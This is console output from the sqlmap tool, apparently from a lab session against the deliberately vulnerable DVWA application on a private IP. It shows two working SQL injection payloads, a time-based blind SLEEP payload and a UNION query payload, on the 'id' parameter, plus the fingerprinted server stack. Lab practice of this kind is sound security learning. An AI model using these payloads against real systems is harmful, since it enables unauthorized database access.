        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6#stable}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:14:06 /2022-04-28/

[14:14:06] [INFO] parsing HTTP request from '/home/kali/Documents/DVWA_Cookie.txt'
[14:14:06] [INFO] resuming back-end DBMS 'mysql' 
[14:14:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=123' AND (SELECT 1427 FROM (SELECT(SLEEP(5)))tVhz) AND 'snHE'='snHE&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=123' UNION ALL SELECT CONCAT(0x716a767a71,0x5444477445426c6677736a4f6a6a4f6b4f6e507556454f52574270517845645465456e756e534277,0x7176717871),NULL-- -&Submit=Submit
---
[14:14:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[14:14:06] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.18'

[*] ending @ 14:14:06 /2022-04-28/

